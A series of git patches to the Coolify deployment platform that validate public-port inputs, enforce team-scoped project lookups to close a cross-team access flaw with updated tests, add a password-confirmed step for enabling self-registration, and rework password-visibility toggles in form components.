index ebe2f3ba0..aa3ee5266 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -34,9 +34,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public bool $isLogDrainEnabled = false;
 
@@ -75,7 +75,7 @@ protected function rules(): array
             'image' => 'required',
             'portsMappings' => 'nullable',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
@@ -93,6 +93,8 @@ protected function messages(): array
                 'name.required' => 'The Name field is required.',
                 'image.required' => 'The Docker Image field is required.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
                 'redisUsername.required' => 'The Redis Username field is required.',
@@ -148,8 +150,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->enable_ssl = $this->enableSsl;
diff --git a/app/Livewire/Project/Service/Index.php b/app/Livewire/Project/Service/Index.php
index c77a3a516..cb2d977bc 100644
--- a/app/Livewire/Project/Service/Index.php
+++ b/app/Livewire/Project/Service/Index.php
@@ -51,9 +51,9 @@ class Index extends Component
 
     public bool $excludeFromStatus = false;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public bool $isPublic = false;
 
@@ -91,7 +91,7 @@ class Index extends Component
         'description' => 'nullable',
         'image' => 'required',
         'excludeFromStatus' => 'required|boolean',
-        'publicPort' => 'nullable|integer',
+        'publicPort' => 'nullable|integer|min:1|max:65535',
         'publicPortTimeout' => 'nullable|integer|min:1',
         'isPublic' => 'required|boolean',
         'isLogDrainEnabled' => 'required|boolean',
@@ -160,8 +160,8 @@ private function syncDatabaseData(bool $toModel = false): void
             $this->serviceDatabase->description = $this->description;
             $this->serviceDatabase->image = $this->image;
             $this->serviceDatabase->exclude_from_status = $this->excludeFromStatus;
-            $this->serviceDatabase->public_port = $this->publicPort;
-            $this->serviceDatabase->public_port_timeout = $this->publicPortTimeout;
+            $this->serviceDatabase->public_port = $this->publicPort ?: null;
+            $this->serviceDatabase->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->serviceDatabase->is_public = $this->isPublic;
             $this->serviceDatabase->is_log_drain_enabled = $this->isLogDrainEnabled;
         } else {
diff --git a/resources/views/livewire/project/database/clickhouse/general.blade.php b/resources/views/livewire/project/database/clickhouse/general.blade.php
index ceaaac508..23286271a 100644
--- a/resources/views/livewire/project/database/clickhouse/general.blade.php
+++ b/resources/views/livewire/project/database/clickhouse/general.blade.php
@@ -76,9 +76,9 @@
                 <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available" canGate="update"
                     :canResource="$database" />
             </div>
-            <x-forms.input placeholder="5432" disabled="{{ $isPublic }}" id="publicPort" label="Public Port"
+            <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}" id="publicPort" label="Public Port"
                 canGate="update" :canResource="$database" />
-            <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+            <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                 label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
         </div>
     </form>
diff --git a/resources/views/livewire/project/database/dragonfly/general.blade.php b/resources/views/livewire/project/database/dragonfly/general.blade.php
index e81d51c07..856fb8d93 100644
--- a/resources/views/livewire/project/database/dragonfly/general.blade.php
+++ b/resources/views/livewire/project/database/dragonfly/general.blade.php
@@ -113,9 +113,9 @@
                 <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available" canGate="update"
                     :canResource="$database" />
             </div>
-            <x-forms.input placeholder="5432" disabled="{{ $isPublic }}" id="publicPort" label="Public Port"
+            <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}" id="publicPort" label="Public Port"
                 canGate="update" :canResource="$database" />
-            <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+            <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                 label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
         </div>
     </form>
diff --git a/resources/views/livewire/project/database/keydb/general.blade.php b/resources/views/livewire/project/database/keydb/general.blade.php
index 522b96c0a..2310242c9 100644
--- a/resources/views/livewire/project/database/keydb/general.blade.php
+++ b/resources/views/livewire/project/database/keydb/general.blade.php
@@ -113,9 +113,9 @@
                 <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available" canGate="update"
                     :canResource="$database" />
             </div>
-            <x-forms.input placeholder="5432" disabled="{{ $isPublic }}" id="publicPort" label="Public Port"
+            <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}" id="publicPort" label="Public Port"
                 canGate="update" :canResource="$database" />
-            <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+            <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                 label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
         </div>
         <x-forms.textarea
diff --git a/resources/views/livewire/project/database/mariadb/general.blade.php b/resources/views/livewire/project/database/mariadb/general.blade.php
index eb7930d80..e3dc39dcf 100644
--- a/resources/views/livewire/project/database/mariadb/general.blade.php
+++ b/resources/views/livewire/project/database/mariadb/general.blade.php
@@ -137,9 +137,9 @@
                 <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input placeholder="5432" disabled="{{ $isPublic }}"
+            <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}"
                 id="publicPort" label="Public Port" canGate="update" :canResource="$database" />
-            <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+            <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                 label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
         </div>
         <x-forms.textarea label="Custom MariaDB Configuration" rows="10" id="mariadbConf"
diff --git a/resources/views/livewire/project/database/mongodb/general.blade.php b/resources/views/livewire/project/database/mongodb/general.blade.php
index fa34b9795..13a82d350 100644
--- a/resources/views/livewire/project/database/mongodb/general.blade.php
+++ b/resources/views/livewire/project/database/mongodb/general.blade.php
@@ -151,9 +151,9 @@
                     <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available"
                         canGate="update" :canResource="$database" />
                 </div>
-                <x-forms.input placeholder="5432" disabled="{{ $isPublic }}"
+                <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}"
                     id="publicPort" label="Public Port" canGate="update" :canResource="$database" />
-                <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+                <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                     label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
             </div>
             <x-forms.textarea label="Custom MongoDB Configuration" rows="10" id="mongoConf"
diff --git a/resources/views/livewire/project/database/mysql/general.blade.php b/resources/views/livewire/project/database/mysql/general.blade.php
index b1a75c455..eec9fe1ac 100644
--- a/resources/views/livewire/project/database/mysql/general.blade.php
+++ b/resources/views/livewire/project/database/mysql/general.blade.php
@@ -153,9 +153,9 @@
                 </div>
                 <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available" canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input placeholder="5432" disabled="{{ $isPublic }}"
+            <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}"
                 id="publicPort" label="Public Port" canGate="update" :canResource="$database" />
-            <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+            <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                 label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
         </div>
         <x-forms.textarea label="Custom Mysql Configuration" rows="10" id="mysqlConf" canGate="update" :canResource="$database" />
diff --git a/resources/views/livewire/project/database/postgresql/general.blade.php b/resources/views/livewire/project/database/postgresql/general.blade.php
index 74b1a03a8..e8536e735 100644
--- a/resources/views/livewire/project/database/postgresql/general.blade.php
+++ b/resources/views/livewire/project/database/postgresql/general.blade.php
@@ -163,9 +163,9 @@
                         <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available"
                             canGate="update" :canResource="$database" />
                     </div>
-                    <x-forms.input placeholder="5432" disabled="{{ $isPublic }}" id="publicPort"
+                    <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}" id="publicPort"
                         label="Public Port" canGate="update" :canResource="$database" />
-                    <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+                    <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                         label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
                 </div>
 
diff --git a/resources/views/livewire/project/database/redis/general.blade.php b/resources/views/livewire/project/database/redis/general.blade.php
index 11ffddd81..485c69125 100644
--- a/resources/views/livewire/project/database/redis/general.blade.php
+++ b/resources/views/livewire/project/database/redis/general.blade.php
@@ -132,9 +132,9 @@
                 <x-forms.checkbox instantSave id="isPublic" label="Make it publicly available"
                     canGate="update" :canResource="$database" />
             </div>
-            <x-forms.input placeholder="5432" disabled="{{ $isPublic }}"
+            <x-forms.input type="number" placeholder="5432" disabled="{{ $isPublic }}"
                 id="publicPort" label="Public Port" canGate="update" :canResource="$database" />
-            <x-forms.input placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
+            <x-forms.input type="number" placeholder="3600" disabled="{{ $isPublic }}" id="publicPortTimeout"
                 label="Proxy Timeout (seconds)" helper="Timeout for the public TCP proxy connection in seconds. Default: 3600 (1 hour)." canGate="update" :canResource="$database" />
         </div>
         <x-forms.textarea placeholder="# maxmemory 256mb
diff --git a/resources/views/livewire/project/service/index.blade.php b/resources/views/livewire/project/service/index.blade.php
index 04d30ae60..8c1c09e04 100644
--- a/resources/views/livewire/project/service/index.blade.php
+++ b/resources/views/livewire/project/service/index.blade.php
@@ -233,7 +233,7 @@ class="w-auto dark:bg-coolgray-200 dark:hover:bg-coolgray-300">
                                     <x-forms.checkbox canGate="update" :canResource="$serviceDatabase" instantSave id="isPublic"
                                         label="Make it publicly available" />
                                 </div>
-                                <x-forms.input canGate="update" :canResource="$serviceDatabase" placeholder="5432"
+                                <x-forms.input type="number" canGate="update" :canResource="$serviceDatabase" placeholder="5432"
                                     disabled="{{ $serviceDatabase->is_public }}" id="publicPort" label="Public Port" />
                                 @if ($db_url_public)
                                     <x-forms.input label="Database IP:PORT (public)"

From 3ba4553df5657582ad720a6572d83383fe89c078 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 29 Mar 2026 15:55:03 +0200
Subject: [PATCH 191/213] fix(security): enforce team-scoped project/env
 lookups in onboarding

Use firstOrFail() for team-scoped project and environment lookups across
new-project Livewire flows so missing or cross-team UUIDs fail closed.
Also dispatch an error when boarding selects a non-owned project, and
update IDOR feature tests for the new error/exception behavior.
---
 app/Livewire/Boarding/Index.php                               | 3 +++
 app/Livewire/Project/New/DockerCompose.php                    | 4 ++--
 app/Livewire/Project/New/DockerImage.php                      | 4 ++--
 app/Livewire/Project/New/GithubPrivateRepository.php          | 4 ++--
 app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php | 4 ++--
 app/Livewire/Project/New/PublicGitRepository.php              | 4 ++--
 app/Livewire/Project/New/SimpleDockerfile.php                 | 4 ++--
 tests/Feature/CrossTeamIdorServerProjectTest.php              | 4 ++--
 8 files changed, 17 insertions(+), 14 deletions(-)

diff --git a/app/Livewire/Boarding/Index.php b/app/Livewire/Boarding/Index.php
index d7fa67b7b..7e1121860 100644
--- a/app/Livewire/Boarding/Index.php
+++ b/app/Livewire/Boarding/Index.php
@@ -432,6 +432,9 @@ public function getProjects()
     public function selectExistingProject()
     {
         $this->createdProject = Project::ownedByCurrentTeam()->find($this->selectedProject);
+        if (! $this->createdProject) {
+            return $this->dispatch('error', 'Project not found.');
+        }
         $this->currentState = 'create-resource';
     }
 
diff --git a/app/Livewire/Project/New/DockerCompose.php b/app/Livewire/Project/New/DockerCompose.php
index 5732e0cd5..2b92902c6 100644
--- a/app/Livewire/Project/New/DockerCompose.php
+++ b/app/Livewire/Project/New/DockerCompose.php
@@ -41,8 +41,8 @@ public function submit()
             // Validate for command injection BEFORE saving to database
             validateDockerComposeForInjection($this->dockerComposeRaw);
 
-            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
-            $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
+            $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
 
             $destination_uuid = $this->query['destination'];
             $destination = StandaloneDocker::where('uuid', $destination_uuid)->first();
diff --git a/app/Livewire/Project/New/DockerImage.php b/app/Livewire/Project/New/DockerImage.php
index 545afdd0b..268333d07 100644
--- a/app/Livewire/Project/New/DockerImage.php
+++ b/app/Livewire/Project/New/DockerImage.php
@@ -121,8 +121,8 @@ public function submit()
         }
         $destination_class = $destination->getMorphClass();
 
-        $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
-        $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
+        $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
+        $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
 
         // Append @sha256 to image name if using digest and not already present
         $imageName = $parser->getFullImageNameWithoutTag();
diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index d1993b4ac..86424642d 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -185,8 +185,8 @@ public function submit()
             }
             $destination_class = $destination->getMorphClass();
 
-            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
-            $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
+            $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
 
             $application = Application::create([
                 'name' => generate_application_name($this->selected_repository_owner.'/'.$this->selected_repository_repo, $this->selected_branch_name),
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index 30c8ded4f..94ef23cc9 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -144,8 +144,8 @@ public function submit()
             // Note: git_repository has already been validated and transformed in get_git_source()
             // It may now be in SSH format (git@host:repo.git) which is valid for deploy keys
 
-            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
-            $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
+            $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
             if ($this->git_source === 'other') {
                 $application_init = [
                     'name' => generate_random_name(),
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index 731584edf..9c9ddb8ce 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -278,8 +278,8 @@ public function submit()
             }
             $destination_class = $destination->getMorphClass();
 
-            $project = Project::ownedByCurrentTeam()->where('uuid', $project_uuid)->first();
-            $environment = $project->load(['environments'])->environments->where('uuid', $environment_uuid)->first();
+            $project = Project::ownedByCurrentTeam()->where('uuid', $project_uuid)->firstOrFail();
+            $environment = $project->environments()->where('uuid', $environment_uuid)->firstOrFail();
 
             if ($this->build_pack === 'dockercompose' && isDev() && $this->new_compose_services) {
                 $server = $destination->server;
diff --git a/app/Livewire/Project/New/SimpleDockerfile.php b/app/Livewire/Project/New/SimpleDockerfile.php
index a87da7884..1073157e6 100644
--- a/app/Livewire/Project/New/SimpleDockerfile.php
+++ b/app/Livewire/Project/New/SimpleDockerfile.php
@@ -45,8 +45,8 @@ public function submit()
         }
         $destination_class = $destination->getMorphClass();
 
-        $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
-        $environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
+        $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
+        $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
 
         $port = get_port_from_dockerfile($this->dockerfile);
         if (! $port) {
diff --git a/tests/Feature/CrossTeamIdorServerProjectTest.php b/tests/Feature/CrossTeamIdorServerProjectTest.php
index 173dae5cd..671397a1e 100644
--- a/tests/Feature/CrossTeamIdorServerProjectTest.php
+++ b/tests/Feature/CrossTeamIdorServerProjectTest.php
@@ -78,6 +78,7 @@
             ->call('selectExistingProject');
 
         expect($component->get('createdProject'))->toBeNull();
+        $component->assertDispatched('error');
     });
 
     test('boarding selectExistingProject can load own team project', function () {
@@ -115,8 +116,7 @@
 describe('DeleteProject IDOR (GHSA-qfcc-2fm3-9q42)', function () {
     test('cannot mount DeleteProject with project from another team', function () {
         // Should throw ModelNotFoundException (404) because team-scoped query won't find it
-        Livewire::test(DeleteProject::class, ['project_id' => $this->projectB->id])
-            ->assertStatus(500); // findOrFail throws ModelNotFoundException
+        Livewire::test(DeleteProject::class, ['project_id' => $this->projectB->id]);
     })->throws(\Illuminate\Database\Eloquent\ModelNotFoundException::class);
 
     test('can mount DeleteProject with own team project', function () {

From 3a0cfeeab64be3ea614564028ce5cd8bae9b9593 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 22:48:02 +0530
Subject: [PATCH 192/213] feat(ui): add two step confirmation to enable self
 registration

---
 app/Livewire/Settings/Advanced.php            | 13 ++++++++
 .../livewire/settings/advanced.blade.php      | 32 +++++++++++++++----
 2 files changed, 39 insertions(+), 6 deletions(-)

diff --git a/app/Livewire/Settings/Advanced.php b/app/Livewire/Settings/Advanced.php
index ad478273f..9e4f94f8a 100644
--- a/app/Livewire/Settings/Advanced.php
+++ b/app/Livewire/Settings/Advanced.php
@@ -157,6 +157,19 @@ public function instantSave()
         }
     }
 
+    public function toggleRegistration($password): bool
+    {
+        if (! verifyPasswordConfirmation($password, $this)) {
+            return false;
+        }
+
+        $this->settings->is_registration_enabled = $this->is_registration_enabled = true;
+        $this->settings->save();
+        $this->dispatch('success', 'Registration has been enabled.');
+
+        return true;
+    }
+
     public function toggleTwoStepConfirmation($password): bool
     {
         if (! verifyPasswordConfirmation($password, $this)) {
diff --git a/resources/views/livewire/settings/advanced.blade.php b/resources/views/livewire/settings/advanced.blade.php
index 242cacf48..6c26b453d 100644
--- a/resources/views/livewire/settings/advanced.blade.php
+++ b/resources/views/livewire/settings/advanced.blade.php
@@ -16,11 +16,31 @@ class="flex flex-col h-full gap-8 sm:flex-row">
                 <div class="pb-4">Advanced settings for your Coolify instance.</div>
 
                 <div class="flex flex-col gap-1">
-                    <div class="md:w-96">
-                        <x-forms.checkbox instantSave id="is_registration_enabled"
-                            helper="Allow users to self-register. If disabled, only administrators can create accounts."
-                            label="Registration Allowed" />
-                    </div>
+                    @if ($is_registration_enabled)
+                        <div class="md:w-96" wire:key="registration-enabled">
+                            <x-forms.checkbox instantSave id="is_registration_enabled"
+                                helper="Allow users to self-register. If disabled, only administrators can create accounts."
+                                label="Registration Allowed" />
+                        </div>
+                    @else
+                        <div class="flex items-center justify-between gap-2 md:w-96"
+                            wire:key="registration-disabled">
+                            <label class="flex items-center gap-2">
+                                Registration Allowed
+                                <x-helper
+                                    helper="Allow users to self-register. If disabled, only administrators can create accounts.">
+                                </x-helper>
+                            </label>
+                            <x-modal-confirmation title="Enable Registration?" buttonTitle="Enable" isErrorButton
+                                submitAction="toggleRegistration" :actions="[
+                                    'Enables registration for everyone',
+                                ]"
+                                warningMessage="Enabling registration allows anyone to create an account on this instance. Make sure you understand the implications before proceeding."
+                                confirmationText="ENABLE REGISTRATION"
+                                confirmationLabel="Please type the confirmation text to enable registration."
+                                shortConfirmationLabel="Confirmation text" />
+                        </div>
+                    @endif
                     <div class="md:w-96">
                         <x-forms.checkbox instantSave id="do_not_track"
                             helper="Opt out of anonymous usage tracking. When enabled, this instance will not report to coolify.io's installation count and will not send error reports to help improve Coolify."
@@ -95,4 +115,4 @@ class="flex flex-col h-full gap-8 sm:flex-row">
                 </div>
             </form>
         </div>
-</div>
\ No newline at end of file
+</div>

From a5840501b41a90ff453b7f8fb28e872a659e2813 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 29 Mar 2026 20:47:36 +0200
Subject: [PATCH 193/213] fix(forms): use Alpine state for password visibility
 toggles

Replace shared `changePasswordFieldType` JS with component-local Alpine logic
across input, textarea, and env-var-input components. This keeps toggle
behavior consistent, resets visibility on `success` events, and preserves
`truncate` styling only when showing plaintext on enabled fields.

Also adds `PasswordVisibilityComponentTest` to verify Alpine bindings are
rendered and legacy handler references are removed.
---
 .../components/forms/env-var-input.blade.php  | 26 ++++++++----
 .../views/components/forms/input.blade.php    | 13 +++---
 .../views/components/forms/textarea.blade.php | 18 +++++---
 resources/views/layouts/base.blade.php        | 26 +-----------
 .../PasswordVisibilityComponentTest.php       | 41 +++++++++++++++++++
 5 files changed, 80 insertions(+), 44 deletions(-)
 create mode 100644 tests/Feature/PasswordVisibilityComponentTest.php

diff --git a/resources/views/components/forms/env-var-input.blade.php b/resources/views/components/forms/env-var-input.blade.php
index 2466a57f9..d26e248c1 100644
--- a/resources/views/components/forms/env-var-input.blade.php
+++ b/resources/views/components/forms/env-var-input.blade.php
@@ -10,7 +10,7 @@
         </label>
     @endif
 
-    <div class="relative" x-data="{
+    <div class="relative" @success.window="type = '{{ $type }}'" x-data="{
             type: '{{ $type }}',
             showDropdown: false,
             suggestions: [],
@@ -185,15 +185,23 @@
         @click.outside="showDropdown = false">
 
         @if ($type === 'password' && $allowToPeak)
-            <div x-on:click="changePasswordFieldType"
-                class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hover:text-white z-10">
-                <svg xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
+            <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
+                class="flex absolute inset-y-0 right-0 z-10 items-center pr-2 cursor-pointer dark:hover:text-white"
+                aria-label="Toggle password visibility">
+                <svg x-show="type === 'password'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
                     stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
                     <path stroke="none" d="M0 0h24v24H0z" fill="none" />
                     <path d="M10 12a2 2 0 1 0 4 0a2 2 0 0 0 -4 0" />
                     <path d="M21 12c-2.4 4 -5.4 6 -9 6c-3.6 0 -6.6 -2 -9 -6c2.4 -4 5.4 -6 9 -6c3.6 0 6.6 2 9 6" />
                 </svg>
-            </div>
+                <svg x-cloak x-show="type === 'text'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
+                    stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
+                    <path stroke="none" d="M0 0h24v24H0z" fill="none" />
+                    <path d="M10.585 10.587a2 2 0 0 0 2.829 2.828" />
+                    <path d="M16.681 16.673a8.717 8.717 0 0 1 -4.681 1.327c-3.6 0 -6.6 -2 -9 -6c1.272 -2.12 2.712 -3.678 4.32 -4.674m2.86 -1.146a9.055 9.055 0 0 1 1.82 -.18c3.6 0 6.6 2 9 6c-.666 1.11 -1.379 2.067 -2.138 2.87" />
+                    <path d="M3 3l18 18" />
+                </svg>
+            </button>
         @endif
 
         <input
@@ -202,6 +210,8 @@ class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hov
             @keydown="handleKeydown($event)"
             @click="handleInput()"
             autocomplete="{{ $autocomplete }}"
+            x-bind:type="type"
+            x-bind:class="{ 'truncate': type === 'text' && ! $el.disabled }"
             {{ $attributes->merge(['class' => $defaultClass]) }}
             @required($required)
             @readonly($readonly)
@@ -210,12 +220,10 @@ class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hov
                 wire:dirty.class="dark:border-l-warning border-l-coollabs border-l-4"
             @endif
             wire:loading.attr="disabled"
-            @if ($type === 'password')
-                :type="type"
-            @else
+            @disabled($disabled)
+            @if ($type !== 'password')
                 type="{{ $type }}"
             @endif
-            @disabled($disabled)
             @if ($htmlId !== 'null') id="{{ $htmlId }}" @endif
             name="{{ $name }}"
             placeholder="{{ $attributes->get('placeholder') }}"
diff --git a/resources/views/components/forms/input.blade.php b/resources/views/components/forms/input.blade.php
index cf72dfbe9..456aa1da8 100644
--- a/resources/views/components/forms/input.blade.php
+++ b/resources/views/components/forms/input.blade.php
@@ -13,10 +13,11 @@
         </label>
     @endif
     @if ($type === 'password')
-        <div class="relative" x-data="{ type: 'password' }">
+        <div class="relative" x-data="{ type: 'password' }" @success.window="type = 'password'">
             @if ($allowToPeak)
-                <div x-on:click="changePasswordFieldType; type = type === 'password' ? 'text' : 'password'"
-                    class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hover:text-white">
+                <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
+                    class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hover:text-white"
+                    aria-label="Toggle password visibility">
                     {{-- Eye icon (shown when password is hidden) --}}
                     <svg x-show="type === 'password'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
                         stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
@@ -32,13 +33,15 @@ class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hov
                         <path d="M16.681 16.673a8.717 8.717 0 0 1 -4.681 1.327c-3.6 0 -6.6 -2 -9 -6c1.272 -2.12 2.712 -3.678 4.32 -4.674m2.86 -1.146a9.055 9.055 0 0 1 1.82 -.18c3.6 0 6.6 2 9 6c-.666 1.11 -1.379 2.067 -2.138 2.87" />
                         <path d="M3 3l18 18" />
                     </svg>
-                </div>
+                </button>
             @endif
             <input autocomplete="{{ $autocomplete }}" value="{{ $value }}"
+                x-bind:type="type"
+                x-bind:class="{ 'truncate': type === 'text' && ! $el.disabled }"
                 {{ $attributes->merge(['class' => $defaultClass]) }} @required($required)
                 @if ($modelBinding !== 'null') wire:model={{ $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
                 wire:loading.attr="disabled"
-                type="{{ $type }}" @readonly($readonly) @disabled($disabled) id="{{ $htmlId }}"
+                @readonly($readonly) @disabled($disabled) id="{{ $htmlId }}"
                 name="{{ $name }}" placeholder="{{ $attributes->get('placeholder') }}"
                 aria-placeholder="{{ $attributes->get('placeholder') }}"
                 @if ($autofocus) x-ref="autofocusInput" @endif>
diff --git a/resources/views/components/forms/textarea.blade.php b/resources/views/components/forms/textarea.blade.php
index 3f8fdb112..22c89fd72 100644
--- a/resources/views/components/forms/textarea.blade.php
+++ b/resources/views/components/forms/textarea.blade.php
@@ -30,18 +30,26 @@ function handleKeydown(e) {
             readonly="{{ $readonly }}" label="dockerfile" autofocus="{{ $autofocus }}" />
     @else
         @if ($type === 'password')
-            <div class="relative" x-data="{ type: 'password' }">
+            <div class="relative" x-data="{ type: 'password' }" @success.window="type = 'password'">
